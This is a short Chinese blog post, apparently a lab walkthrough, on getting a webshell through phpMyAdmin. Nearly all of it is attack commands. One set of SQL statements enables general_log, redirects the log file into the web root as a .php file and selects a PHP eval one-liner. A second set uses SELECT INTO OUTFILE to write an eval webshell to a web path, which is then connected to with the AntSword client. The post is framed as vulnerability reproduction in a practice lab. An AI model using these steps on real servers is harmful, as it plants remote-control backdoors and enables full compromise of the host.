PhPMyadmin-cms漏洞复现

一.通过日志文件拿Shell

打开靶场连接数据库

来到sql中输入

复制代码
show global variables like '%general%';
复制代码
set global general_log='on'; //⽇志保存状态开启;
复制代码
set global general_log_file = 'D:/phpstudy/phpstudy_pro/WWW/123.php'  //修改日志保存位置
复制代码
show global variables like '%general%';
复制代码
select '<?php eval($_POST[cmd]);?>';

看看是否能连接成功

二.导入导出拿webshell

输入select @@datadir我们可以看到mysql路径

所以我们推测web路径为D:/phpstudy/phpstudy_pro/WWW

复制代码
select "<?php eval($_POST[a]);?>" into outfile 'D:/phpstudy/phpstudy_pro/WWW/666.php'

去访问

再用蚁剑连接一下试试

相关推荐
H轨迹H5 小时前
Hack The Box-代理连接及靶机-Meow-喵呜
网络安全·渗透测试·hack the box·web漏洞
豆豆12 小时前
请大家推荐一款免费的网站模版。
cms·网站建设·网站制作·建站平台·自助建站·网站模版·智能建站
橙子202521 小时前
文件解析漏洞靶场集锦详解
安全·web安全·网络安全
白帽少女安琪拉1 天前
24.pocsuite3:开源的远程漏洞测试框架
网络·网络安全
go_to_hacker2 天前
奇安信二面
网络·web安全·网络安全·渗透测试·代码审计·春招
黑客笔记2 天前
网络安全常识科普(百问百答)
计算机网络·web安全·网络安全
黑客笔记2 天前
第2章 网络安全评估平台(网络安全评估)
web安全·网络安全
MC何失眠2 天前
vulnhub靶场之stapler靶机
网络·学习·安全·web安全·网络安全
it技术分享just_free2 天前
软考教材重点内容 信息安全工程师 第19章 操作系统安全保护
web安全·网络安全·信息安全·软考